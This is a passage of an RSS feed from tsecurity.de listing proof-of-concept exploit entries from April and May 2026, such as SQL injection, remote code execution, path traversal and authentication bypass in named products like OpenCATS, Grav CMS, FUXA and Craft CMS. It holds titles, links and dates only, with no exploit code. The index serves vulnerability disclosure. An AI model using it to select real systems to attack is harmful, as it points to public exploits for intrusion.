<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[scramble - Remote Code Execution]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] OpenCATS 0.9.7.4 - SQL Injection]]></title>
<description><![CDATA[OpenCATS 0.9.7.4 - SQL Injection]]></description>
<link>https://tsecurity.de/de/3551118/poc/webapps-opencats-0974-sql-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3551118/poc/webapps-opencats-0974-sql-injection/</guid>
<pubDate>Wed, 27 May 2026 14:55:17 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[OpenCATS 0.9.7.4 - SQL Injection]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Grav CMS 2.0.0-beta.2 -  Remote Code Execution]]></title>
<description><![CDATA[Grav CMS 2.0.0-beta.2 -  Remote Code Execution]]></description>
<link>https://tsecurity.de/de/3548506/poc/webapps-grav-cms-200-beta2-remote-code-execution/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3548506/poc/webapps-grav-cms-200-beta2-remote-code-execution/</guid>
<pubDate>Tue, 26 May 2026 17:26:55 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Grav CMS 2.0.0-beta.2 -  Remote Code Execution]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] cPanel - CRLF Injection]]></title>
<description><![CDATA[cPanel - CRLF Injection]]></description>
<link>https://tsecurity.de/de/3548445/poc/webapps-cpanel-crlf-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3548445/poc/webapps-cpanel-crlf-injection/</guid>
<pubDate>Tue, 26 May 2026 17:10:30 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[cPanel - CRLF Injection]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Wordpress Temporary Login Plugin  1.0.0 - 'temp-login-token' Authentication Bypass to Account Takeover]]></title>
<description><![CDATA[Wordpress Temporary Login Plugin  1.0.0 - 'temp-login-token' Authentication Bypass to Account Takeover]]></description>
<link>https://tsecurity.de/de/3548444/poc/webapps-wordpress-temporary-login-plugin-100-temp-login-token-authentication-bypass-to-account-takeover/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3548444/poc/webapps-wordpress-temporary-login-plugin-100-temp-login-token-authentication-bypass-to-account-takeover/</guid>
<pubDate>Tue, 26 May 2026 17:10:28 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Wordpress Temporary Login Plugin  1.0.0 - 'temp-login-token' Authentication Bypass to Account Takeover]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Apache HTTP Server 2.4.66 - 'mod_http2' Double-Free Denial of Service]]></title>
<description><![CDATA[Apache HTTP Server 2.4.66 - 'mod_http2' Double-Free Denial of Service]]></description>
<link>https://tsecurity.de/de/3548442/poc/webapps-apache-http-server-2466-modhttp2-double-free-denial-of-service/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3548442/poc/webapps-apache-http-server-2466-modhttp2-double-free-denial-of-service/</guid>
<pubDate>Tue, 26 May 2026 17:10:25 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apache HTTP Server 2.4.66 - 'mod_http2' Double-Free Denial of Service]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] BookStack 25.12.1 - Denial of Service]]></title>
<description><![CDATA[BookStack 25.12.1 - Denial of Service]]></description>
<link>https://tsecurity.de/de/3536562/poc/webapps-bookstack-25121-denial-of-service/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3536562/poc/webapps-bookstack-25121-denial-of-service/</guid>
<pubDate>Thu, 21 May 2026 15:40:57 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[BookStack 25.12.1 - Denial of Service]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] FUXA  1.2.9 -  RCE]]></title>
<description><![CDATA[FUXA  1.2.9 -  RCE]]></description>
<link>https://tsecurity.de/de/3536561/poc/webapps-fuxa-129-rce/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3536561/poc/webapps-fuxa-129-rce/</guid>
<pubDate>Thu, 21 May 2026 15:40:55 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[FUXA  1.2.9 -  RCE]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] solaredge - (CSRF-OOB-Injection)]]></title>
<description><![CDATA[solaredge - (CSRF-OOB-Injection)]]></description>
<link>https://tsecurity.de/de/3536560/poc/webapps-solaredge-csrf-oob-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3536560/poc/webapps-solaredge-csrf-oob-injection/</guid>
<pubDate>Thu, 21 May 2026 15:40:53 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[solaredge - (CSRF-OOB-Injection)]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Cockpit 359 - RCE]]></title>
<description><![CDATA[Cockpit 359 - RCE]]></description>
<link>https://tsecurity.de/de/3536559/poc/webapps-cockpit-359-rce/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3536559/poc/webapps-cockpit-359-rce/</guid>
<pubDate>Thu, 21 May 2026 15:40:51 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Cockpit 359 - RCE]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] WordPress Plugin Supsystic Contact Form 1.7.36 - SSTI]]></title>
<description><![CDATA[WordPress Plugin Supsystic Contact Form 1.7.36 - SSTI]]></description>
<link>https://tsecurity.de/de/3517059/poc/webapps-wordpress-plugin-supsystic-contact-form-1736-ssti/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3517059/poc/webapps-wordpress-plugin-supsystic-contact-form-1736-ssti/</guid>
<pubDate>Thu, 14 May 2026 16:39:46 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[WordPress Plugin Supsystic Contact Form 1.7.36 - SSTI]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] ePati Antikor NGFW 2.0.1301 -  Authentication Bypass]]></title>
<description><![CDATA[ePati Antikor NGFW 2.0.1301 -  Authentication Bypass]]></description>
<link>https://tsecurity.de/de/3516826/poc/webapps-epati-antikor-ngfw-201301-authentication-bypass/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3516826/poc/webapps-epati-antikor-ngfw-201301-authentication-bypass/</guid>
<pubDate>Thu, 14 May 2026 15:12:27 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ePati Antikor NGFW 2.0.1301 -  Authentication Bypass]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] PJPROJECT 2.16 - Heap Bufferoverflow]]></title>
<description><![CDATA[PJPROJECT 2.16 - Heap Bufferoverflow]]></description>
<link>https://tsecurity.de/de/3516825/poc/webapps-pjproject-216-heap-bufferoverflow/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3516825/poc/webapps-pjproject-216-heap-bufferoverflow/</guid>
<pubDate>Thu, 14 May 2026 15:12:25 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[PJPROJECT 2.16 - Heap Bufferoverflow]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Apache HertzBeat 1.8.0 - Remote Code Execution]]></title>
<description><![CDATA[Apache HertzBeat 1.8.0 - Remote Code Execution]]></description>
<link>https://tsecurity.de/de/3516824/poc/webapps-apache-hertzbeat-180-remote-code-execution/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3516824/poc/webapps-apache-hertzbeat-180-remote-code-execution/</guid>
<pubDate>Thu, 14 May 2026 15:12:22 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apache HertzBeat 1.8.0 - Remote Code Execution]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] glances 4.5.2 - command injection]]></title>
<description><![CDATA[glances 4.5.2 - command injection]]></description>
<link>https://tsecurity.de/de/3513847/poc/webapps-glances-452-command-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3513847/poc/webapps-glances-452-command-injection/</guid>
<pubDate>Wed, 13 May 2026 15:25:55 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[glances 4.5.2 - command injection]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Ninja Forms Uploads - Unauthenticated PHP File Upload]]></title>
<description><![CDATA[Ninja Forms Uploads - Unauthenticated PHP File Upload]]></description>
<link>https://tsecurity.de/de/3513846/poc/webapps-ninja-forms-uploads-unauthenticated-php-file-upload/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3513846/poc/webapps-ninja-forms-uploads-unauthenticated-php-file-upload/</guid>
<pubDate>Wed, 13 May 2026 15:25:53 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ninja Forms Uploads - Unauthenticated PHP File Upload]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Flowise < 3.0.5 - Missing Authentication for Critical Function]]></title>
<description><![CDATA[Flowise < 3.0.5 - Missing Authentication for Critical Function]]></description>
<link>https://tsecurity.de/de/3513772/poc/webapps-flowise-305-missing-authentication-for-critical-function/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3513772/poc/webapps-flowise-305-missing-authentication-for-critical-function/</guid>
<pubDate>Wed, 13 May 2026 15:07:27 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Flowise &lt; 3.0.5 - Missing Authentication for Critical Function]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] coreruleset 4.21.0 - Firewall Bypass]]></title>
<description><![CDATA[coreruleset 4.21.0 - Firewall Bypass]]></description>
<link>https://tsecurity.de/de/3513771/poc/webapps-coreruleset-4210-firewall-bypass/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3513771/poc/webapps-coreruleset-4210-firewall-bypass/</guid>
<pubDate>Wed, 13 May 2026 15:07:25 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[coreruleset 4.21.0 - Firewall Bypass]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Bludit CMS 3.18.4 -  RCE]]></title>
<description><![CDATA[Bludit CMS 3.18.4 -  RCE]]></description>
<link>https://tsecurity.de/de/3496349/poc/webapps-bludit-cms-3184-rce/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3496349/poc/webapps-bludit-cms-3184-rce/</guid>
<pubDate>Thu, 07 May 2026 16:25:32 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Bludit CMS 3.18.4 -  RCE]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] LuaJIT 2.1.1774638290 - Arbitrary Code Execution]]></title>
<description><![CDATA[LuaJIT 2.1.1774638290 - Arbitrary Code Execution]]></description>
<link>https://tsecurity.de/de/3496348/poc/webapps-luajit-211774638290-arbitrary-code-execution/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3496348/poc/webapps-luajit-211774638290-arbitrary-code-execution/</guid>
<pubDate>Thu, 07 May 2026 16:25:31 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[LuaJIT 2.1.1774638290 - Arbitrary Code Execution]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Ghost CMS 6.19.0 - SQLi]]></title>
<description><![CDATA[Ghost CMS 6.19.0 - SQLi]]></description>
<link>https://tsecurity.de/de/3496347/poc/webapps-ghost-cms-6190-sqli/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3496347/poc/webapps-ghost-cms-6190-sqli/</guid>
<pubDate>Thu, 07 May 2026 16:25:28 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ghost CMS 6.19.0 - SQLi]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] ThingsBoard IoT Platform 4.2.0 - Server-Side Request Forgery (SSRF)]]></title>
<description><![CDATA[ThingsBoard IoT Platform 4.2.0 - Server-Side Request Forgery (SSRF)]]></description>
<link>https://tsecurity.de/de/3496275/poc/webapps-thingsboard-iot-platform-420-server-side-request-forgery-ssrf/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3496275/poc/webapps-thingsboard-iot-platform-420-server-side-request-forgery-ssrf/</guid>
<pubDate>Thu, 07 May 2026 16:11:11 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ThingsBoard IoT Platform 4.2.0 - Server-Side Request Forgery (SSRF)]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Traccar GPS Tracking System 6.11.1 - Cross-Site WebSocket Hijacking (CSWSH)]]></title>
<description><![CDATA[Traccar GPS Tracking System 6.11.1 - Cross-Site WebSocket Hijacking (CSWSH)]]></description>
<link>https://tsecurity.de/de/3486282/poc/webapps-traccar-gps-tracking-system-6111-cross-site-websocket-hijacking-cswsh/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3486282/poc/webapps-traccar-gps-tracking-system-6111-cross-site-websocket-hijacking-cswsh/</guid>
<pubDate>Mon, 04 May 2026 15:40:50 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Traccar GPS Tracking System 6.11.1 - Cross-Site WebSocket Hijacking (CSWSH)]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] MindsDB  25.9.1.1 - Path Traversal]]></title>
<description><![CDATA[MindsDB  25.9.1.1 - Path Traversal]]></description>
<link>https://tsecurity.de/de/3486280/poc/webapps-mindsdb-25911-path-traversal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3486280/poc/webapps-mindsdb-25911-path-traversal/</guid>
<pubDate>Mon, 04 May 2026 15:40:47 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[MindsDB  25.9.1.1 - Path Traversal]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] FUXA 1.2.8 - Authentication Bypass + RCE Exploit]]></title>
<description><![CDATA[FUXA 1.2.8 - Authentication Bypass + RCE Exploit]]></description>
<link>https://tsecurity.de/de/3477228/poc/webapps-fuxa-128-authentication-bypass-rce-exploit/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3477228/poc/webapps-fuxa-128-authentication-bypass-rce-exploit/</guid>
<pubDate>Thu, 30 Apr 2026 12:38:57 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[FUXA 1.2.8 - Authentication Bypass + RCE Exploit]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Python-Multipart 0.0.22 - Path Traversal]]></title>
<description><![CDATA[Python-Multipart 0.0.22 - Path Traversal]]></description>
<link>https://tsecurity.de/de/3477117/poc/webapps-python-multipart-0022-path-traversal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3477117/poc/webapps-python-multipart-0022-path-traversal/</guid>
<pubDate>Thu, 30 Apr 2026 12:08:39 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Python-Multipart 0.0.22 - Path Traversal]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Repetier-Server 1.4.10 - Path Traversal]]></title>
<description><![CDATA[Repetier-Server 1.4.10 - Path Traversal]]></description>
<link>https://tsecurity.de/de/3477070/poc/webapps-repetier-server-1410-path-traversal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3477070/poc/webapps-repetier-server-1410-path-traversal/</guid>
<pubDate>Thu, 30 Apr 2026 11:51:18 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Repetier-Server 1.4.10 - Path Traversal]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] HUSTOJ Zip-Slip v26.01.24 -  RCE]]></title>
<description><![CDATA[HUSTOJ Zip-Slip v26.01.24 -  RCE]]></description>
<link>https://tsecurity.de/de/3477069/poc/webapps-hustoj-zip-slip-v260124-rce/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3477069/poc/webapps-hustoj-zip-slip-v260124-rce/</guid>
<pubDate>Thu, 30 Apr 2026 11:51:16 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[HUSTOJ Zip-Slip v26.01.24 -  RCE]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] BusyBox 1.37.0 - Path Traversal]]></title>
<description><![CDATA[BusyBox 1.37.0 - Path Traversal]]></description>
<link>https://tsecurity.de/de/3476885/poc/webapps-busybox-1370-path-traversal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3476885/poc/webapps-busybox-1370-path-traversal/</guid>
<pubDate>Thu, 30 Apr 2026 10:53:17 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[BusyBox 1.37.0 - Path Traversal]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] JUNG Smart Visu Server 1.1.1050 - Dos]]></title>
<description><![CDATA[JUNG Smart Visu Server 1.1.1050 - Dos]]></description>
<link>https://tsecurity.de/de/3476884/poc/webapps-jung-smart-visu-server-111050-dos/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3476884/poc/webapps-jung-smart-visu-server-111050-dos/</guid>
<pubDate>Thu, 30 Apr 2026 10:53:15 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[JUNG Smart Visu Server 1.1.1050 - Dos]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] SumatraPDF 3.5.2 - Remote Code Execution]]></title>
<description><![CDATA[SumatraPDF 3.5.2 - Remote Code Execution]]></description>
<link>https://tsecurity.de/de/3476828/poc/webapps-sumatrapdf-352-remote-code-execution/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3476828/poc/webapps-sumatrapdf-352-remote-code-execution/</guid>
<pubDate>Thu, 30 Apr 2026 10:23:08 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[SumatraPDF 3.5.2 - Remote Code Execution]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Frigate NVR 0.16.3 - Remote Code Execution]]></title>
<description><![CDATA[Frigate NVR 0.16.3 - Remote Code Execution]]></description>
<link>https://tsecurity.de/de/3476827/poc/webapps-frigate-nvr-0163-remote-code-execution/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3476827/poc/webapps-frigate-nvr-0163-remote-code-execution/</guid>
<pubDate>Thu, 30 Apr 2026 10:23:06 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Frigate NVR 0.16.3 - Remote Code Execution]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] NiceGUI 3.6.1 - Path Traversal]]></title>
<description><![CDATA[NiceGUI 3.6.1 - Path Traversal]]></description>
<link>https://tsecurity.de/de/3476826/poc/webapps-nicegui-361-path-traversal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3476826/poc/webapps-nicegui-361-path-traversal/</guid>
<pubDate>Thu, 30 Apr 2026 10:23:04 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[NiceGUI 3.6.1 - Path Traversal]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Js2Py 0.74 -  RCE]]></title>
<description><![CDATA[Js2Py 0.74 -  RCE]]></description>
<link>https://tsecurity.de/de/3476785/poc/webapps-js2py-074-rce/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3476785/poc/webapps-js2py-074-rce/</guid>
<pubDate>Thu, 30 Apr 2026 10:07:18 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Js2Py 0.74 -  RCE]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Cybersecurity AI (CAI) Framework 0.5.10 - Command Injection]]></title>
<description><![CDATA[Cybersecurity AI (CAI) Framework 0.5.10 - Command Injection]]></description>
<link>https://tsecurity.de/de/3476695/poc/webapps-cybersecurity-ai-cai-framework-0510-command-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3476695/poc/webapps-cybersecurity-ai-cai-framework-0510-command-injection/</guid>
<pubDate>Thu, 30 Apr 2026 09:36:19 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Cybersecurity AI (CAI) Framework 0.5.10 - Command Injection]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Camaleon CMS  v2.9.0 - Path Traversal]]></title>
<description><![CDATA[Camaleon CMS  v2.9.0 - Path Traversal]]></description>
<link>https://tsecurity.de/de/3476694/poc/webapps-camaleon-cms-v290-path-traversal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3476694/poc/webapps-camaleon-cms-v290-path-traversal/</guid>
<pubDate>Thu, 30 Apr 2026 09:36:18 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Camaleon CMS  v2.9.0 - Path Traversal]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] SUSE Manager 4.3.15 - Code Execution]]></title>
<description><![CDATA[SUSE Manager 4.3.15 - Code Execution]]></description>
<link>https://tsecurity.de/de/3476662/poc/webapps-suse-manager-4315-code-execution/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3476662/poc/webapps-suse-manager-4315-code-execution/</guid>
<pubDate>Thu, 30 Apr 2026 09:23:04 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[SUSE Manager 4.3.15 - Code Execution]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Erugo  0.2.14 - Remote Code Execution (RCE)]]></title>
<description><![CDATA[Erugo  0.2.14 - Remote Code Execution (RCE)]]></description>
<link>https://tsecurity.de/de/3476661/poc/webapps-erugo-0214-remote-code-execution-rce/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3476661/poc/webapps-erugo-0214-remote-code-execution-rce/</guid>
<pubDate>Thu, 30 Apr 2026 09:23:02 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Erugo  0.2.14 - Remote Code Execution (RCE)]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] deephas 1.0.7 - Prototype Pollution]]></title>
<description><![CDATA[deephas 1.0.7 - Prototype Pollution]]></description>
<link>https://tsecurity.de/de/3476660/poc/webapps-deephas-107-prototype-pollution/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3476660/poc/webapps-deephas-107-prototype-pollution/</guid>
<pubDate>Thu, 30 Apr 2026 09:23:01 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[deephas 1.0.7 - Prototype Pollution]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Craft CMS 5.6.16 - RCE]]></title>
<description><![CDATA[Craft CMS 5.6.16 - RCE]]></description>
<link>https://tsecurity.de/de/3474252/poc/webapps-craft-cms-5616-rce/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3474252/poc/webapps-craft-cms-5616-rce/</guid>
<pubDate>Wed, 29 Apr 2026 13:22:28 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Craft CMS 5.6.16 - RCE]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] HAX CMS 24.x - Stored Cross-Site Scripting (XSS)]]></title>
<description><![CDATA[HAX CMS 24.x - Stored Cross-Site Scripting (XSS)]]></description>
<link>https://tsecurity.de/de/3474250/poc/webapps-hax-cms-24x-stored-cross-site-scripting-xss/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3474250/poc/webapps-hax-cms-24x-stored-cross-site-scripting-xss/</guid>
<pubDate>Wed, 29 Apr 2026 13:22:24 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[HAX CMS 24.x - Stored Cross-Site Scripting (XSS)]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] GeographicLib v2.5.1 - stack buffer overflow]]></title>
<description><![CDATA[GeographicLib v2.5.1 - stack buffer overflow]]></description>
<link>https://tsecurity.de/de/3474107/poc/webapps-geographiclib-v251-stack-buffer-overflow/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3474107/poc/webapps-geographiclib-v251-stack-buffer-overflow/</guid>
<pubDate>Wed, 29 Apr 2026 12:36:23 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[GeographicLib v2.5.1 - stack buffer overflow]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] phpMyFAQ  4.0.16 - Improper Authorization]]></title>
<description><![CDATA[phpMyFAQ  4.0.16 - Improper Authorization]]></description>
<link>https://tsecurity.de/de/3474106/poc/webapps-phpmyfaq-4016-improper-authorization/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3474106/poc/webapps-phpmyfaq-4016-improper-authorization/</guid>
<pubDate>Wed, 29 Apr 2026 12:36:21 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[phpMyFAQ  4.0.16 - Improper Authorization]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] OpenKM 6.3.12 - Multiple]]></title>
<description><![CDATA[OpenKM 6.3.12 - Multiple]]></description>
<link>https://tsecurity.de/de/3473581/poc/webapps-openkm-6312-multiple/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3473581/poc/webapps-openkm-6312-multiple/</guid>
<pubDate>Wed, 29 Apr 2026 09:35:44 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[OpenKM 6.3.12 - Multiple]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] FacturaScripts 2025.43 - XSS]]></title>
<description><![CDATA[FacturaScripts 2025.43 - XSS]]></description>
<link>https://tsecurity.de/de/3473554/poc/webapps-facturascripts-202543-xss/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3473554/poc/webapps-facturascripts-202543-xss/</guid>
<pubDate>Wed, 29 Apr 2026 09:23:02 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[FacturaScripts 2025.43 - XSS]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] GUnet OpenEclass E-learning platform < 4.2 - Remote Code Execution (RCE)]]></title>
<description><![CDATA[GUnet OpenEclass E-learning platform < 4.2 - Remote Code Execution (RCE)]]></description>
<link>https://tsecurity.de/de/3473553/poc/webapps-gunet-openeclass-e-learning-platform-42-remote-code-execution-rce/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3473553/poc/webapps-gunet-openeclass-e-learning-platform-42-remote-code-execution-rce/</guid>
<pubDate>Wed, 29 Apr 2026 09:23:01 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[GUnet OpenEclass E-learning platform &lt; 4.2 - Remote Code Execution (RCE)]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] JuzaWeb CMS 3.4.2 - Authenticated Remote Code Execution]]></title>
<description><![CDATA[JuzaWeb CMS 3.4.2 - Authenticated Remote Code Execution]]></description>
<link>https://tsecurity.de/de/3473552/poc/webapps-juzaweb-cms-342-authenticated-remote-code-execution/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3473552/poc/webapps-juzaweb-cms-342-authenticated-remote-code-execution/</guid>
<pubDate>Wed, 29 Apr 2026 09:23:00 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[JuzaWeb CMS 3.4.2 - Authenticated Remote Code Execution]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Xibo CMS  4.3.0 - RCE via SSTI]]></title>
<description><![CDATA[Xibo CMS  4.3.0 - RCE via SSTI]]></description>
<link>https://tsecurity.de/de/3473340/poc/webapps-xibo-cms-430-rce-via-ssti/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3473340/poc/webapps-xibo-cms-430-rce-via-ssti/</guid>
